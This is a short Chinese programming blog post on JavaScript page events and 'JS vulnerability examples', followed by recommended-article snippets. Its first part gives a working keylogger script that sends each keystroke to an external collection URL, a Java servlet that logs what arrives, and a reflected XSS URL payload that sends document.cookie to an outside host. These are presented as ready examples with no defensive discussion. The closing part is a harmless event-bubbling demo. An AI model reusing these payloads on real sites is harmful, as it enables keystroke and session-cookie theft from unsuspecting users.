js页面事件响应及js漏洞示例

最新推荐文章于 2023-02-06 17:19:15 发布
最新推荐文章于 2023-02-06 17:19:15 发布
阅读量120 收藏
点赞数
文章标签: Chrome IE Servlet HTML
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w110713121/article/details/83935388
版权
[color=red]js:[/color]
<script>
function keylogger (e) {
document.images[0].src="http://www.ckfinancing.com/study/cookie?cookie="+e.keyCode;
}
document.body.attachEvent("onkeydown", keylogger);
</script>

[color=red]servlet:
http://www.ckfinancing.com/study/cookie?cookie=[/color]
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/html;charset=UTF-8");
String cookie = request.getParameter("cookie");
System.out.println(cookie);
}

<==========================================================================>

http://a.com/search?keyword=<script>document.images[0].src="http://b.com/xxxx?cookie="+unescape

(document.cookie);</script>

[color=red]servlet参考上面例子[/color]
<==========================================================================>

js页面键盘事件响应
<script type="text/javascript">
//FF,Chrome
if(window.addEventListener){
document.addEventListener('click',function(e){alert('document');},false);
document.body.addEventListener('click',function(e){alert('document.body');e.cancelBubble=true;},true);
}
//IE
else if(window.attachEvent){
document.attachEvent('onclick', function(e){alert('document');});
document.body.attachEvent('onclick', function(e){alert('document.body');e=e||

window.event;e.cancelBubble=true;});
}
</script>
hanqingwang
关注
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台上的一款快速、开放、极简的 Web 开发...
JS文件接口漏洞
一醉一休的博客
02-25 2375
现在网页一般都会使用javascript实现页面的动态效果,在使用到javascript的页面中,javascript代码存放的位置一般存在这几个位置 1.在<script 与 /script>标签之间 2.在一些javascript事件中 3.外置的javascript代码,以.js文件存在 前言   我们可以通过键盘的F12快速打开调试工具,可以看到在html代码里面嵌入了一些js文件,也能够在网络请求中看到一些js文件的请求。   而在网页的这些.
js经典案例_WebFuzzing方法和漏洞案例总结
weixin_39546661的博客
11-26 300
WebFuzzing方法和漏洞案例总结作者:Vulkey_Chen博客:http://gh0st.cn背景之前有幸做过一次线下的议题分享《我的Web应用安全模糊测试之路》,讲解了一些常用的WebFuzzing技巧和案例,该议题得到了很大的回响,很多师傅们也与我进行了交流,但考虑到之前分享过很多思路非常不全面,这里以本篇文章作为一次总结,以实战引出技巧思路(方法)。我的Web应用安全模糊测试之路议题...
前端js传输明文漏洞
zhangtxsir的博客
01-16 1015
我这是用的是用到的是Google的aes加密算法,下载地址https://github.com/brix/crypto-js/tree/master,中间还是踩了一些坑,aes加密算法有多种模式,具体可看https://www.cnblogs.com/shawWey/p/8425663.html 我这是用到的是CBC模式,废话不多说,直接上代码js代码 //aes加密 function e...
Node.js 常见漏洞学习与总结
lastwinn的博客
02-06 1889
记录自己的所学以及理解
过滤器过滤response,设置成response.setContentType(“text/html;charset=utf-8“);导致CSS无法正常加载
zhanghongbin159的博客
03-06 707
Resource interpreted as Stylesheet but transferred with MIME type text/html 报错 方法一: 方法二: @WebFilter("/") public class EncodingFilter implements Filter{ @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
js-tetris:现代JavaScript中的俄罗斯方块游戏
05-11
本项目“js-tetris”就是这样一个示例,它充分展示了JavaScript在游戏开发领域的强大能力。 在JavaScript的世界里,俄罗斯方块的实现涉及到了多个关键知识点: 1. **事件监听与处理**:游戏的核心在于玩家的输入...
WebLogic SSRF 及漏洞修复
11-25
漏洞主要出现在版本10.0.2和10.3.6的`SearchPublicRegistries.jsp`页面中,该页面存在不当的用户输入验证机制,使得攻击者可以通过构造恶意URL来触发SSRF攻击。 **2. 攻击原理** - **构造恶意URL**: 攻击者可以...
catalog-demo:这是一个示例 JavaScript 应用程序,用于演示 Airbus 目录 API 的使用
06-03
开发者需要一个支持JavaScript的开发环境,例如Visual Studio Code,安装必要的扩展(如Node.js和相关库)以运行和调试这个示例应用程序。同时,可能还需要设置本地服务器来运行HTML和JavaScript文件。 8. **代码...
java、javascript实现附件下载示例
10-25
在本次的示例中,我们将利用Java和JavaScript来展示如何实现附件下载的模块。在服务器端,使用Java进行文件的读取和传输;在客户端,使用JavaScript和HTML元素来触发下载。 首先,服务器端的Java代码通过一个映射到...
response.setContentType()的作用及参数(转载)
weixin_30878501的博客
09-21 2056
response.setContentType(MIME)的作用是使客户端浏览器,区分不同种类的数据,并根据不同的MIME调用浏览器内不同的程序嵌入模块来处理相应的数据。例如web浏览器就是通过MIME类型来判断文件是GIF图片。通过MIME类型来处理json字符串。 Tomcat的安装目录\conf\web.xml 中就定义了大量MIME类型 ,可以参考。response.setCo...
JS中常见的安全漏洞
热门推荐
qq_34309704的博客
04-09 1万+
  1、基于DOM的跨站点脚本编制(XSS) ①XSS(Cross Site Script):跨站点脚本编制,指的是攻击者向合法的web页面插入恶意的脚本代码(通常是是HTML代码JS代码),然后提交给服务器,随即服务器响应页面(被植入的恶意脚本代码),攻击者可以利用这些恶意脚本代码进行会话挟持登攻击。例如:攻击者在论坛中放一个看似安全得连接,骗取用户点击之后,盗取cookies得用户隐私信...
JS安全漏洞-1.1
caishu1995的博客
01-09 848
1、基于DOM的跨站点脚本编制     XSS(cross site script,跨站脚本攻击),指的是攻击者向合理的web中插入恶意脚本代码,然后提交给服务器,随机服务器相应页面即被植入攻击者的恶意脚本代码。      应对方法:1、不信任用户输入的内容 2、对输入的内容进行转义 3、防止攻击者通过利用document.的属性植入恶意脚本   2、通过URL重定向钓鱼   3、客户...
python中paramiko插件
最新发布
10-13
这是pjython中最重要的一个插件,所以我们要先下载到csdn中
fastcache-1.1.0-cp38-cp38-win_amd64.whl
10-13
fastcache-1.1.0-cp38-cp38-win_amd64.whl
【图像检索】基于matlab颜色特征图像检索(含直方图距离)【含Matlab源码 4145期】.md
10-13
CSDN Matlab武动乾坤上传的资料均有对应的代码代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 KNN图像检索、Hu不变矩图像检索、综合颜色和形状特征图像检索
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值